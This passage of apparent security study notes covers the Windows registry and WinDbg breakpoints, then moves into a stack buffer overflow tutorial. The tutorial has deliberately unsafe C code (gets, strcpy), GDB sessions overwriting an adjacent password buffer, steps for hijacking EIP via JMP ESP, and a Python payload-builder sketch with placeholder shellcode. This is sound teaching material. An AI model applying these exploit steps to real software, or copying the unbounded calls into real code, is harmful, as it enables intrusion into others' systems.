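if __name__ == "__main__":
    print(hkcr_view(hklm_classes, hkcu_classes))
    hkcr_write(hklm_classes, hkcu_classes, ".log", "logfile")    # stored in HKLM
    hkcr_write(hklm_classes, hkcu_classes, ".txt", "Other.Doc")  # stored in HKCU
    print(hklm_classes, hkcu_classes)
```

The model ignores subkeys and permissions; it only shows which of the two sources wins on read and which one receives a write.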

Note

The registry in 64-bit versions of Windows XP, Windows Server 2003, and Windows Vista is
divided into 32-bit and 64-bit keys. Many of the 32-bit keys have the same names as their 64-
bit counterparts, and vice versa. The default 64-bit version of Registry Editor that is included
with 64-bit versions of Windows XP, Windows Server 2003, and Windows Vista displays the 32-
bit keys under the node HKEY_LOCAL_MACHINE\Software\WOW6432Node. For more
information about how to view the registry on 64-Bit versions of Windows, see How to view
the system registry by using 64-bit versions of Windows.
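
As a rough illustration of the note above, the following sketch rewrites a key path under HKEY_LOCAL_MACHINE\Software into the location where the 64-bit Registry Editor displays the 32-bit copy. The helper name to_wow64_view and the sample vendor key are hypothetical, and the sketch assumes every key under Software is displayed this way, which is a simplification.

```python
# Sketch only: string manipulation, no registry access.
PREFIX = "HKEY_LOCAL_MACHINE\\Software"
NODE = "WOW6432Node"


def to_wow64_view(path):
    r"""Map HKLM\Software\<rest> to HKLM\Software\WOW6432Node\<rest>."""
    head, tail = path[:len(PREFIX)], path[len(PREFIX):]
    if head.lower() != PREFIX.lower() or (tail and not tail.startswith("\\")):
        return path                          # not under HKLM\Software
    rest = tail.lstrip("\\")
    if rest.lower().split("\\")[0] == NODE.lower():
        return path                          # already inside the 32-bit node
    return "\\".join(part for part in (PREFIX, NODE, rest) if part)


# ExampleVendor\App is a made-up key used only for the demonstration.
print(to_wow64_view(r"HKEY_LOCAL_MACHINE\Software\ExampleVendor\App"))
```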

The following table lists the data types that are currently defined and that are used by
Windows. The maximum size of a value name is as follows:

• Windows Server 2003, Windows XP, and Windows Vista: 16,383 characters

• Windows 2000: 260 ANSI characters or 16,383 Unicode characters

• Windows Millennium Edition/Windows 98/Windows 95: 255 characters

Long values (more than 2,048 bytes) must be stored as files with the file names stored in the
registry. This helps the registry perform efficiently. The maximum size of a value is as follows:

• Windows NT 4.0/Windows 2000/Windows XP/Windows Server 2003/Windows Vista: Available memory

• Windows Millennium Edition/Windows 98/Windows 95: 16,300 bytes

Note

There is a 64K limit for the total size of all values of a key.
Name  Data type  Description

Binary Value  REG_BINARY  Raw binary data. Most hardware component information is stored as
binary data and is displayed in Registry Editor in hexadecimal format.

DWORD Value  REG_DWORD  Data represented by a number that is 4 bytes long (a 32-bit integer).
Many parameters for device drivers and services are this type and are displayed in Registry
Editor in binary, hexadecimal, or decimal format. Related values are REG_DWORD_LITTLE_ENDIAN
(least significant byte is at the lowest address) and REG_DWORD_BIG_ENDIAN (least significant
byte is at the highest address).

Expandable String Value  REG_EXPAND_SZ  A variable-length data string. This data type includes
variables that are resolved when a program or service uses the data.

Multi-String Value  REG_MULTI_SZ  A multiple string. Values that contain lists or multiple
values in a form that people can read are generally this type. Entries are separated by spaces,
commas, or other marks.

String Value  REG_SZ  A fixed-length text string.

Binary Value  REG_RESOURCE_LIST  A series of nested arrays that is designed to store a resource
list that is used by a hardware device driver or one of the physical devices it controls. This
data is detected and written in the \ResourceMap tree by the system and is displayed in
Registry Editor in hexadecimal format as a Binary Value.

Binary Value  REG_RESOURCE_REQUIREMENTS_LIST  A series of nested arrays that is designed to
store a device driver's list of possible hardware resources the driver or one of the physical
devices it controls can use. The system writes a subset of this list in the \ResourceMap tree.
This data is detected by the system and is displayed in Registry Editor in hexadecimal format
as a Binary Value.

Binary Value  REG_FULL_RESOURCE_DESCRIPTOR  A series of nested arrays that is designed to store
a resource list that is used by a physical hardware device. This data is detected and written
in the \HardwareDescription tree by the system and is displayed in Registry Editor in
hexadecimal format as a Binary Value.

None  REG_NONE  Data without any particular type. This data is written to the registry by the
system or applications and is displayed in Registry Editor in hexadecimal format as a Binary
Value.

Link  REG_LINK  A Unicode string naming a symbolic link.

QWORD Value  REG_QWORD  Data represented by a number that is a 64-bit integer. This data is
displayed in Registry Editor as a Binary Value and was introduced in Windows 2000.
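
To make the byte-order remarks in the table concrete, here is a small sketch that packs the same number the way the little-endian and big-endian DWORD types lay it out, plus a 64-bit QWORD. It uses only Python's struct module; the sample value 0x12345678 is arbitrary, and nothing is read from or written to a real registry.

```python
import struct

value = 0x12345678  # arbitrary sample number

# REG_DWORD / REG_DWORD_LITTLE_ENDIAN: least significant byte at the lowest address.
dword_le = struct.pack("<I", value)
# REG_DWORD_BIG_ENDIAN: least significant byte at the highest address.
dword_be = struct.pack(">I", value)
# REG_QWORD: a 64-bit integer, shown here in little-endian order.
qword = struct.pack("<Q", value)

print(dword_le.hex())  # 78563412
print(dword_be.hex())  # 12345678
print(qword.hex())     # 7856341200000000
```
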
Back up the registry

Before you edit the registry, export the keys in the registry that you plan to edit, or back up the
whole registry. If a problem occurs, you can then follow the steps in the Restore the
registry section to restore the registry to its previous state. To back up the whole registry, use
the Backup utility to back up the system state. The system state includes the registry, the
COM+ Class Registration Database, and your boot files. For more information about how to
use the Backup utility to back up the system state, see the following articles:

• Back up and restore your PC

• How to use the backup feature to back up and restore data in Windows Server 2003

Edit the registry

To modify registry data, a program must use the registry functions that are defined in Registry
Functions.

Administrators can modify the registry by using Registry Editor (Regedit.exe or Regedt32.exe),
Group Policy, System Policy, Registry (.reg) files, or by running scripts such as Visual Basic
script files.

Use the Windows user interface

We recommend that you use the Windows user interface to change your system settings
instead of manually editing the registry. However, editing the registry may sometimes be the
best method to resolve a product issue. If the issue is documented in the Microsoft Knowledge
Base, an article with step-by-step instructions to edit the registry for that issue will be
available. We recommend that you follow those instructions exactly.

Use Registry Editor

Warning

Serious problems might occur if you modify the registry incorrectly by using Registry Editor or
by using another method. These problems might require that you reinstall the operating
system. Microsoft cannot guarantee that these problems can be solved. Modify the registry at
your own risk.

You can use Registry Editor to do the following actions:

• Locate a subtree, key, subkey, or value

• Add a subkey or a value

• Change a value

• Delete a subkey or a value

• Rename a subkey or a value

The navigation area of Registry Editor displays folders. Each folder represents a predefined key
on the local computer. When you access the registry of a remote computer, only two
predefined keys appear: HKEY_USERS and HKEY_LOCAL_MACHINE.

Use Group Policy

Microsoft Management Console (MMC) hosts administrative tools that you can use to
administer networks, computers, services, and other system components. The Group Policy
MMC snap-in lets administrators define policy settings that are applied to computers or users.
You can implement Group Policy on local computers by using the local Group Policy MMC
snap-in, Gpedit.msc. You can implement Group Policy in Active Directory by using the Active
Directory Users and Computers MMC snap-in. For more information about how to use Group
Policy, see the Help topics in the appropriate Group Policy MMC snap-in.

Use a Registration Entries (.reg) file

Create a Registration Entries (.reg) file that contains the registry changes, and then run the .reg
file on the computer where you want to make the changes. You can run the .reg file manually
or by using a logon script. For more information, see How to add, modify, or delete registry
subkeys and values by using a Registration Entries (.reg) file.
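
As a minimal sketch of what such a file contains, the helper below builds the text of a .reg file for a single key. The function name make_reg_file, the key ExampleApp, and its values are all made up for illustration; only string (REG_SZ) and integer (REG_DWORD) values are handled, and the text is returned rather than written to disk or imported.

```python
def make_reg_file(key_path, values):
    """Build the text of a .reg file for one key.

    values maps value names to str (written as a string value) or
    int (written as dword:XXXXXXXX).
    """
    lines = ["Windows Registry Editor Version 5.00", "", "[{}]".format(key_path)]
    for name, data in values.items():
        if isinstance(data, int):
            lines.append('"{}"=dword:{:08x}'.format(name, data & 0xFFFFFFFF))
        else:
            # Backslashes and double quotes are escaped inside string data.
            escaped = data.replace("\\", "\\\\").replace('"', '\\"')
            lines.append('"{}"="{}"'.format(name, escaped))
    return "\r\n".join(lines) + "\r\n"


if __name__ == "__main__":
    text = make_reg_file(
        r"HKEY_CURRENT_USER\Software\ExampleApp",        # hypothetical key
        {"InstallDir": r"C:\ExampleApp", "Retries": 3},  # hypothetical values
    )
    print(text)
```

Review the generated text before importing it on a test machine, since importing a .reg file changes the registry immediately.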

Use Windows Script Host

The Windows Script Host lets you run VBScript and JScript scripts directly in the operating
system. You can create VBScript and JScript files that use Windows Script Host methods to
delete, to read, and to write registry keys and values. For more information about these
methods, visit the following Microsoft Web sites:

• RegDelete method

• RegRead method

• RegWrite method

Use Windows Management Instrumentation

Windows Management Instrumentation (WMI) is a component of the Microsoft Windows
operating system and is the Microsoft implementation of Web-Based Enterprise Management
(WBEM). WBEM is an industry initiative to develop a standard technology for accessing
management information in an enterprise environment. You can use WMI to automate
administrative tasks (such as editing the registry) in an enterprise environment. You can use
WMI in scripting languages that have an engine on Windows and that handle Microsoft
ActiveX objects. You can also use the WMI Command-Line utility (Wmic.exe) to modify the
Windows registry.

For more information about WMI, see Windows Management Instrumentation.

For more information about the WMI Command-Line utility, see A description of the Windows
Management Instrumentation (WMI) command-line utility (Wmic.exe).

Use Console Registry Tool for Windows

You can use the Console Registry Tool for Windows (Reg.exe) to edit the registry. For help with
the Reg.exe tool, type reg /? at the Command Prompt, and then press ENTER.

Restore the registry

To restore the registry, use the appropriate method.

Method 1: Restore the registry keys

To restore registry subkeys that you exported, double-click the Registration Entries (.reg) file
that you saved in the Export registry subkeys section. Or, you can restore the whole registry
from a backup. For more information about how to restore the whole registry, see the Method
2: Restore the whole registry section later in this article.

Method 2: Restore the whole registry

To restore the whole registry, restore the system state from a backup. For more information
about how to restore the system state from a backup, see How to use Backup to protect data
and restore files and folders on your computer in Windows XP and Windows Vista.

Note

Backing up the system state also creates updated copies of the registry files in
the %SystemRoot%\Repair folder.

https://docs.microsoft.com/en-us/troubleshoot/windows-server/performance/windows-registry-advanced-users

Controlling Execution with WinDbg

WinDbg can set breakpoints to halt the execution flow at desired locations in the code.
There are two different types of breakpoints: software breakpoints and processor (hardware)
breakpoints. Breakpoints controlled directly by the debugger are known as software breakpoints.
Breakpoints controlled by the processor and set through the debugger are known as hardware
breakpoints. In the following section, we will experiment with setting up various software
and hardware breakpoints while attached to the notepad.exe process. We will learn how to set
software breakpoints at particular Windows APIs, some of which are not yet loaded in the
memory space of our application. We will also use hardware breakpoints to determine exactly
when our data is accessed.

You can specify the location of a breakpoint by virtual address, module and routine offsets, or
source file and line number (when in source mode). If you put a breakpoint on a routine
without an offset, the breakpoint is activated when that routine is entered.

There are several additional kinds of breakpoints:

• A breakpoint can be associated with a certain thread.

• A breakpoint can enable a fixed number of passes through an address before it is triggered.

• A breakpoint can automatically issue certain commands when it is triggered.

• A breakpoint can be set on non-executable memory and watch for that location to be
read or written to.

If you are debugging more than one process in user mode, the collection of breakpoints
depends on the current process. To view or change a process' breakpoints, you must select the
process as the current process. For more information about the current process,
see Controlling Processes and Threads.

Debugger Commands for Controlling and Displaying Breakpoints

To control or display breakpoints, you can use the following methods:

• Use the bl (Breakpoint List) command to list existing breakpoints and their current
status.

• Use the .bpcmds (Display Breakpoint Commands) command to list all breakpoints
along with the commands that were used to create them.

• Use the bp (Set Breakpoint) command to set a new breakpoint.

• Use the bu (Set Unresolved Breakpoint) command to set a new breakpoint.

Breakpoints that are set with bu are called unresolved breakpoints; they have different
characteristics than breakpoints that are set with bp. For complete details,
see Unresolved Breakpoints (bu Breakpoints).

• Use the bm (Set Symbol Breakpoint) command to set new breakpoints on symbols
that match a specified pattern. A breakpoint set with bm will be associated with an
address (like a bp breakpoint) if the /d switch is included; it will be unresolved (like
a bu breakpoint) if this switch is not included.

• Use the ba (Break on Access) command to set a processor breakpoint, also known as
a data breakpoint. These breakpoints can be triggered when the memory location is
written to, when it is read, when it is executed as code, or when kernel I/O occurs. For
complete details, see Processor Breakpoints (ba Breakpoints).

• Use the bc (Breakpoint Clear) command to permanently remove one or more breakpoints.

• Use the bd (Breakpoint Disable) command to temporarily disable one or more breakpoints.

• Use the be (Breakpoint Enable) command to re-enable one or more disabled breakpoints.

• Use the br (Breakpoint Renumber) command to change the ID of an existing breakpoint.

• Use the bs (Update Breakpoint Command) command to change the command associated with an
existing breakpoint.

• Use the bsc (Update Conditional Breakpoint) command to change the condition under
which an existing conditional breakpoint occurs.

In Visual Studio and WinDbg, there are several user interface elements that facilitate
controlling and displaying breakpoints. See Setting Breakpoints in Visual Studio and Setting
Breakpoints in WinDbg.

Each breakpoint has a decimal number called the breakpoint ID associated with it. This number
identifies the breakpoint in various commands.

Breakpoint Commands

You can include a command in a breakpoint that is automatically executed when the
breakpoint is hit. For example, the following command breaks at MyFunction+0x47, writes a
dump file, and then resumes execution.

0:000> bu MyFunction+0x47 ".dump c:\mydump.dmp; g"

Note If you are controlling the user-mode debugger from the kernel debugger, do not use g
(Go) in the breakpoint command string. The serial interface might be unable to keep up with
this command, and you will be unable to break back into CDB. For more information about this
situation, see Controlling the User-Mode Debugger from the Kernel Debugger.

Number of Breakpoints

In kernel mode, you can use a maximum of 32 software breakpoints. In user mode, you can
use any number of software breakpoints.

The number of processor breakpoints that are supported depends on the target processor
architecture.

Conditional Breakpoints

You can set a breakpoint that is triggered only under certain conditions. For more information
about these kinds of breakpoints, see Setting a Conditional Breakpoint.

https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/methods-of-controlling-breakpoints

Stack Based Buffer Overflow

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[64];

    if (argc < 2)
    {
        printf("Error - You must supply at least one argument\n");
        return 1;
    }

    /* No bounds check: an argument longer than 63 characters overflows buffer */
    strcpy(buffer, argv[1]);

    return 0;
}

Stack-based buffer overflow exploits are likely the shiniest and most common form of exploit
for remotely taking over the code execution of a process. These exploits were extremely
common 20 years ago, but since then, a huge amount of effort has gone into mitigating stack-
based overflow attacks by operating system developers, application developers, and hardware
manufacturers, with changes even being made to the standard libraries developers use. Below,
we will explore how stack-based overflows work and detail the mitigation strategies that are
put in place to try to prevent them.
Deep dive on stack-based buffer overflow attacks

Understanding stack-based overflow attacks involves at least a basic understanding of
computer memory. Memory in a computer is simply a storage place for data and
instructions—data for storing numbers, letters, images, and anything else, and instructions
that tell the computer what to do with the data. Both are stored in the same memory because
memory was prohibitively expensive in the early days of computing, and reserving it for one
type of storage or another was wasteful. Such an approach where data and instructions are
stored together is known as a Von Neumann architecture. It’s still in use in most computers to
this day, though as you will see, it is not without complications.

On the bright side, while security was not a driving factor in early computer and software
design, engineers realized that changing running instructions in memory was a bad idea, so
even as long ago as the ‘90s, standard hardware and operating systems were doing a good job
of preventing changes to instructional memory. Unfortunately, you don’t really need to change
instructions to change the behavior of a running program, and with a little knowledge,
writeable data memory provides several opportunities and methods for affecting instruction
execution.

Take this particularly contrived example:

#include <signal.h>
#include <stdio.h>
#include <string.h>

int main(){
    char realPassword[20];
    char givenPassword[20];

    strncpy(realPassword, "ddddddddddddddd", 20);
    gets(givenPassword);  /* deliberately unsafe: no bounds check */

    if (0 == strncmp(givenPassword, realPassword, 20)){
        printf("SUCCESS!\n");
    }else{
        printf("FAILURE!\n");
    }

    raise(SIGINT);  /* stop here so the stack can be inspected in a debugger */
    printf("givenPassword: %s\n", givenPassword);
    printf("realPassword: %s\n", realPassword);
    return 0;
}

If you don’t know the C programming language, that’s fine. The interesting thing about this
program is that it creates two buffers in memory called realPassword and givenPassword as
local variables. Each buffer has space for 20 characters. When we run the program, space for
these local variables is created in-memory and specifically stored on the stack with all other
local variables (and some other stuff). The stack is a very structured, sequential memory space,
so the relative distance between any two local variables in-memory is guaranteed to be
relatively small. After this program creates the variables, it populates the realPassword value
with a string, then prompts the user for a password and copies the provided password into
the givenPassword value. Once it has both passwords, it compares them. If they match, it
prints “SUCCESS!” If not, it prints “FAILURE!”

Here’s an example run:

msfuser@ubuntu:~$ ./example.elf

test

FAILURE!

givenPassword: test

realPassword: ddddddddddddddd

This is exactly as we’d expect. The password we entered does not match the expected
password. There is a catch here: The programmer (me) made several really bad mistakes,
which we will talk about later. Before we cover that, though, let’s open a debugger and peek
into memory to see what the stack looks like in memory while the program is executing:

msfuser@ubuntu:~$ gdb example.elf

(gdb) run

Starting program: /home/msfuser/example.elf

aaaaaaaaaaaaaaaa

FAILURE!

Program received signal SIGINT, Interrupt.

0x00007ffff7a42428 in __GI_raise (sig=2) at ../sysdeps/unix/sysv/linux/raise.c:54

54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

(gdb)

At this point, the program has taken in the data and compared it, but I added an interrupt in
the code to stop it before exiting so we could “look” at the stack. Debuggers let us see what
the program is doing and what the memory looks like on a running basis. In this case, we are
using the GNU Debugger (GDB). The GDB command ‘info frame’ allows us to find the location
in memory of the local variables, which will be on the stack:

(gdb) info frame

Stack level 0, frame at 0x7fffffffdde0:

rip = 0x7ffff7a42428 in __GI_raise (../sysdeps/unix/sysv/linux/raise.c:54); saved rip = 0x400701

called by frame at 0x7fffffffde30

source language c.

Arglist at 0x7fffffffddd0, args: sig=2

Locals at 0x7fffffffddd0, Previous frame's sp is 0x7fffffffdde0

Saved registers:

rip at 0x7fffffffddd8

(gdb)

Now that we know where the local variables are, we can print that area of memory:

(gdb) x/200x 0x7fffffffddd0

0x7fffffffddd0: 0x00000000 0x00000000 0x00400701 0x00000000

0x7fffffffdde0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffddf0: 0x00000000 0x00000000 0x00000000 0x00000000

0x7fffffffde00: 0x64646464 0x64646464 0x64646464 0x00646464

0x7fffffffde10: 0x00000000 0x00007fff 0x00000000 0x00000000

As mentioned, the stack is sequentially stored data. If you know ASCII, then you know the
letter ‘a’ is represented in memory by the value 0x61 and the letter ‘d’ is 0x64. You can see
above that they are right next to each other in memory. The realPassword buffer is right after
the givenPassword buffer.
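
The dump prints memory as 32-bit words, so each group of four bytes appears reversed on a little-endian machine. As a quick check, the sketch below takes two rows copied from the dump above, puts the bytes back into memory order, and computes the distance between the two buffers. The helper name row_bytes is just for this illustration.

```python
import struct

# Two rows copied from the dump: (address, four 32-bit words).
rows = [
    (0x7fffffffdde0, [0x61616161, 0x61616161, 0x61616161, 0x61616161]),
    (0x7fffffffde00, [0x64646464, 0x64646464, 0x64646464, 0x00646464]),
]


def row_bytes(words):
    """Return the bytes in memory order for little-endian 32-bit words."""
    return b"".join(struct.pack("<I", w) for w in words)


for address, words in rows:
    print(hex(address), row_bytes(words))

# Distance from the start of givenPassword to the start of realPassword.
print(rows[1][0] - rows[0][0])  # 32
```

The second row decodes to fifteen 'd' characters followed by a NUL terminator, and the two buffers start 32 bytes apart in this particular run even though each was declared with only 20 bytes.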

Now, let’s talk about the mistakes that the programmer (me) made. First, developers should
never, ever, ever use the gets function because it does not check to make sure that the size of
the data it reads in matches the size of the memory location it uses to save the data. It just
blindly reads the text and dumps it into memory. There are many functions that do the exact
same thing—these are known as unbounded functions because developers cannot predict
when they will stop reading from or writing to memory. Microsoft even has a web page
documenting what it calls “banned” functions, which includes these unbounded functions.
Every developer should know these functions and avoid them, and every project should
automatically audit source code for them. These functions all date from a period where
security was not as imperative as it is today. These functions must continue to be supported
because pulling support would break many legacy programs, but they should not be used in
any new programs and should be removed during maintenance of old programs.
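
A very small version of such an automated audit can be sketched with a regular expression. The list of function names below is a short, non-exhaustive sample chosen for illustration (it is not Microsoft's banned list), and the scan is purely textual, so it will also flag matches inside comments or string literals.

```python
import re

# Sample of unbounded C functions; a real audit would use the project's own list.
UNBOUNDED = ("gets", "strcpy", "strcat", "sprintf")
CALL = re.compile(r"\b(" + "|".join(UNBOUNDED) + r")\s*\(")


def find_unbounded_calls(source):
    """Return (line_number, function_name) for each suspicious call."""
    hits = []
    for number, line in enumerate(source.splitlines(), start=1):
        for match in CALL.finditer(line):
            hits.append((number, match.group(1)))
    return hits


if __name__ == "__main__":
    sample = 'gets(givenPassword);\nstrncpy(realPassword, "ddd", 20);\n'
    print(find_unbounded_calls(sample))
```

The word boundary in the pattern keeps bounded variants such as fgets and strncpy from being reported.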

Taking a look at the hack

We have looked at the stack, noticed that the buffers are located consecutively in memory,
and talked about why gets is a bad function. Let’s now abuse gets and see whether we can
hack the planet program. Since we know gets has a problem with reading more than it should,
the first thing to try is to give it more data than the buffer can hold. The buffers are 20
characters, so let’s start with 30 characters:

msfuser@ubuntu:~$ gdb example.elf

(gdb) run

Starting program: /home/msfuser/example.elf

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

FAILURE!

givenPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

realPassword: ddddddddddddddd

Program received signal SIGINT, Interrupt.

0x00007ffff7a42428 in __GI_raise (sig=2) at ../sysdeps/unix/sysv/linux/raise.c:54

54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

(gdb) info frame

Stack level 0, frame at 0x7fffffffdde0:

rip = 0x7ffff7a42428 in __GI_raise (../sysdeps/unix/sysv/linux/raise.c:54); saved rip = 0x40072d

called by frame at 0x7fffffffde30

source language c.

Arglist at 0x7fffffffddd0, args: sig=2

Locals at 0x7fffffffddd0, Previous frame's sp is 0x7fffffffdde0

Saved registers:

rip at 0x7fffffffddd8
(gdb) x/200x 0x7fffffffddd0

0x7fffffffddd0: 0x00000000 0x00000000 0x0040072d 0x00000000

0x7fffffffdde0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffddf0: 0x61616161 0x61616161 0x61616161 0x00006161

0x7fffffffde00: 0x64646464 0x64646464 0x64646464 0x00646464

0x7fffffffde10: 0x00000000 0x00007fff 0x00000000 0x00000000

0x7fffffffde20: 0x00400740 0x00000000 0xf7a2d830 0x00007fff

0x7fffffffde30: 0x00000000 0x00000000 0xffffdf08 0x00007fff

We can see clearly that there are 30 instances of ‘a’ in memory, despite us only specifying
space for 20 characters. We have overflowed the buffer, but not enough to do anything. Let’s
keep trying and try 40 instances of ‘a.’

msfuser@ubuntu:~$ gdb example.elf

(gdb) run

Starting program: /home/msfuser/example.elf

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

FAILURE!

givenPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

realPassword: aaaaaaaa

Program received signal SIGINT, Interrupt.

0x00007ffff7a42428 in __GI_raise (sig=2) at ../sysdeps/unix/sysv/linux/raise.c:54

54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

(gdb) x/200x 0x7fffffffddd0

0x7fffffffddd0: 0x00000000 0x00000000 0x0040072d 0x00000000

0x7fffffffdde0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffddf0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffde00: 0x61616161 0x61616161 0x64646400 0x00646464

0x7fffffffde10: 0x00000000 0x00007fff 0x00000000 0x00000000

0x7fffffffde20: 0x00400740 0x00000000 0xf7a2d830 0x00007fff

The first thing to notice is that we went far enough to pass through the allotted space
for givenPassword and managed to alter the value of realPassword, which is a huge success.
We did not alter it enough to fool the program, though. Since we are comparing 20 characters
and we wrote eight characters to the realPassword buffer, we need to write 12 more
characters. So, let’s try again, but with 52 instances of ‘a’ this time:

msfuser@ubuntu:~$ gdb example.elf

(gdb) run

Starting program: /home/msfuser/example.elf

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

SUCCESS!

givenPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

realPassword: aaaaaaaaaaaaaaaaaaaa

Program received signal SIGINT, Interrupt.

0x00007ffff7a42428 in __GI_raise (sig=2) at ../sysdeps/unix/sysv/linux/raise.c:54

54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

(gdb) info frame

Stack level 0, frame at 0x7fffffffdde0:

rip = 0x7ffff7a42428 in __GI_raise (../sysdeps/unix/sysv/linux/raise.c:54); saved rip = 0x40072d

called by frame at 0x7fffffffde30

source language c.

Arglist at 0x7fffffffddd0, args: sig=2

Locals at 0x7fffffffddd0, Previous frame's sp is 0x7fffffffdde0

Saved registers:

rip at 0x7fffffffddd8

(gdb) x/200x 0x7fffffffddd0

0x7fffffffddd0: 0x00000000 0x00000000 0x0040072d 0x00000000

0x7fffffffdde0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffddf0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffde00: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffde10: 0x61616161 0x00007f00 0x00000000 0x00000000

Success! We overflowed the buffer for givenPassword and the data went straight
into realPassword, so that we were able to alter the realPassword buffer to whatever we
wanted before the check took place. This is an example of a buffer (or stack) overflow attack.
In this case, we used it to alter variables within a program, but it can also be used to alter
metadata used to track program execution.
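
The three runs can be replayed without a debugger using a flat byte array as a stand-in for the stack. This is a simplified model, not the real program: it assumes the 32-byte distance between the two buffers seen in the dumps above (the actual spacing depends on the compiler), and it imitates gets, strncpy, and strncmp by hand.

```python
GIVEN, REAL, SIZE = 0, 32, 20   # offsets from the dump: 0x...de00 - 0x...dde0 = 32


def run(user_input):
    """Simulate the program on a flat 64-byte 'stack' and report the result."""
    stack = bytearray(64)
    # strncpy(realPassword, "ddddddddddddddd", 20): copy, then pad with NULs
    stack[REAL:REAL + SIZE] = b"d" * 15 + b"\x00" * 5
    # gets(givenPassword): copy the input plus a NUL, with no bounds check
    data = user_input + b"\x00"
    stack[GIVEN:GIVEN + len(data)] = data
    # strncmp(givenPassword, realPassword, 20)
    for i in range(SIZE):
        a, b = stack[GIVEN + i], stack[REAL + i]
        if a != b:
            return "FAILURE!"
        if a == 0:
            break
    return "SUCCESS!"


for count in (30, 40, 52):
    print(count, run(b"a" * count))
```

The arithmetic matches the walkthrough: 32 bytes are needed to reach realPassword and 20 more to fill the compared region, which gives the 52 characters used in the successful run.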

https://www.rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/

https://owasp.org/www-community/vulnerabilities/Buffer_Overflow

Memory Layout

Credits: GeeksforGeeks

The Stack

Source: Wikipedia

A stack frame is a block of data that gets pushed onto the stack. In the case of a call stack, a
stack frame represents a function call and its argument data. On x86 with the common cdecl
convention, the caller pushes the arguments first, the call instruction then pushes the return
address, and the called function saves the previous base pointer and reserves space for its
local variables.

Registers

• EAX: Accumulator. Used for performing calculations and for storing return values
from function calls. Basic operations such as add, subtract, and compare use this
general-purpose register.

• EBX: Base (not related to the base pointer). It has no dedicated purpose and can be used
to store data.

• ECX: Counter. Used for iterations; loop instructions count ECX downward.

• EDX: Data. This is an extension of the EAX register. It allows for more complex
calculations (multiply, divide) by allowing extra data to be stored to facilitate those
calculations.

• ESP: Stack pointer

• EBP: Base pointer

• ESI: Source Index holds the location of input data

• EDI: Destination Index points to the location where the result of data operation is
stored

• EIP: Instruction Pointer

How do we Exploit This?

Credits: Acunetix

By overflowing the buffer we can overwrite the saved return address on the stack, which is the
value loaded into EIP when the function returns. The program will then execute instructions at
whatever address we supplied. We can place our shellcode on the stack and set the return
address to the start of the shellcode, and the program will execute the shellcode.

The Actual Hack

1. Write past the end of the buffer and overwrite the saved return address (EIP) to crash the
program.

2. Find the offset in the payload at which EIP is overwritten.

3. Find and remove bad characters.

4. Find the address of a JMP ESP instruction so that program flow can be redirected to the
stack.

5. Overwrite the return address with the address of JMP ESP.

6. Generate the payload and exploit the program.
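
The buffer that these steps build up has a simple layout, which can be sketched as follows. Everything specific here is an assumption for illustration: the offset 146 is the padding length used by the script in these notes, the JMP ESP address is invented, the NOP sled is a common but optional addition, and the "shellcode" is a placeholder of breakpoint instructions rather than a real payload.

```python
import struct

OFFSET = 146                 # padding length used by the script in these notes
JMP_ESP = 0x625011AF         # hypothetical address, for illustration only
NOP_SLED = b"\x90" * 16      # assumption: small NOP sled before the shellcode
SHELLCODE = b"\xcc" * 4      # placeholder (int3 breakpoints), not a real payload


def build_payload(offset, ret_addr, body):
    """padding + little-endian return address + data that ESP will point to."""
    return b"A" * offset + struct.pack("<I", ret_addr) + body


payload = build_payload(OFFSET, JMP_ESP, NOP_SLED + SHELLCODE)
print(len(payload), payload[OFFSET:OFFSET + 4].hex())
```

The return address is packed little-endian because x86 stores the least significant byte first, and the chosen address must not contain any of the bad characters identified for the target.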

Exploiting

Crashing the program

We create a long string using the command python -c "print 'A'*300" and then send it as input
to the server.

Crashed application

We restart the application with Immunity Debugger attached and send the same payload once
more. We can see that the application crashed and the EIP register is overwritten with
41414141 (41 is the hexadecimal ASCII code for A).
Finding Offset

Now that we know that we can overwrite the EIP register we need to find out the exact
number of bytes in the payload after which the EIP gets overwritten. To find this we use a tool
called msf-pattern_create to create a unique non-repeating string and send it as a payload.
After the application crashes, we note the value of EIP and use msf-pattern_offset to calculate
the exact offset.
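
The idea behind the two tools can be sketched in a few lines. This is an imitation of the "Aa0Aa1Aa2..." style of pattern, written for illustration; it is not the Metasploit implementation, and the function names pattern_create and pattern_offset are simply borrowed for readability.

```python
import string
import struct


def pattern_create(length):
    """Build an 'Aa0Aa1Aa2...' style pattern of the requested length."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(eip_value, length=1024):
    """Return the offset of the 4 bytes found in EIP, or -1 if absent."""
    # EIP holds the bytes as a little-endian integer; restore memory order.
    needle = struct.pack("<I", eip_value).decode("latin-1")
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    pattern = pattern_create(300)
    # Pretend the four bytes at offset 146 ended up in EIP after the crash.
    eip = struct.unpack("<I", pattern[146:150].encode("ascii"))[0]
    print(hex(eip), pattern_offset(eip, 300))
```

Because every four-byte window in the pattern is distinct at these lengths, the value seen in EIP identifies exactly one position in the payload.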

Using pattern_create and pattern_offset to find the offset

EIP register overwritten with the payload generated by pattern_create

Finding bad characters

Certain bytes can cause issues in the development of exploits. The null byte (\x00) is almost
always considered a bad character because C string functions treat it as a terminator, so it
